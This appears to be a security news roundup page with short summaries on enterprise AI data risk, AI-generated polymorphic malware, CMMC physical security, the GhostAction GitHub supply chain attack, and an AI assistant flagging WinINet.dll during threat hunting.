Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

The Hidden Risk in Enterprise AI, and the Smarter Way to Safeguard Data

AI exploded into the workplace overnight, reshaping how we work. Today, nearly every employee is experimenting with tools to move faster and think bigger. However, that acceleration comes with risk. According to Cyberhaven Labs’ latest research, nearly three-quarters of AI apps in use pose high or critical risks, and only 16% of enterprise data sent to AI ends up in enterprise-ready apps. The rest flows to personal or unvetted tools.

Adversarial AI and Polymorphic Malware: A New Era of Cyber Threats

The state of cybersecurity has always been in flux, but the arrival of tools like ChatGPT heralded one of the most significant challenges for security teams in years. AI has the potential to unlock incredible potential in data processing and malware detection, but in the wrong hands, Large Language Models (LLMs) and other adversarial AI tools can be used to develop polymorphic malware that can escape detection, gain access to sensitive data, and poison data sets.

6 Best Practices for CMMC Physical Security Control

The first C in CMMC stands for cybersecurity, so it makes sense that the vast majority of content and information about it (both here and elsewhere online) is focused on the cyber aspect. Digital security makes up the bulk of the certification, and it’s by far the biggest threat vector in a modern business space. There is, however, still that detail that has to matter sooner or later: the fact that everything digital has to have somewhere it lives in physical space.

The GhostAction Supply Chain Attack: Compromised GitHub Workflows And Stolen Secrets

GitGuardian has uncovered GhostAction, a massive supply chain attack targeting 327 GitHub users and 817 repositories. Attackers injected malicious workflows that exfiltrated over 3,325 secrets, including npm, PyPI, and DockerHub tokens. Watch as GitGuardian's Senior Cybersecurity Researcher, Guillaume Valadon breaks down how this campaign unfolded, what was stolen, and what developers need to know to stay safe.

The WinINet.dll Red Flag Moment #cybersecurity #ai

Our recent webinar showed how our MCP server enables AI to apply the same technical analysis that expert threat hunters use by providing structured API access to security data and tools. In the demo, Claude identified WinINet.dll loaded in a suspicious process - a discovery that Eric Capuano, founder of Digital Defense Institute, called "a pretty smart move." This moment highlighted how AI can move beyond basic data collection to understand investigative context and connect technical findings to broader threat hypotheses.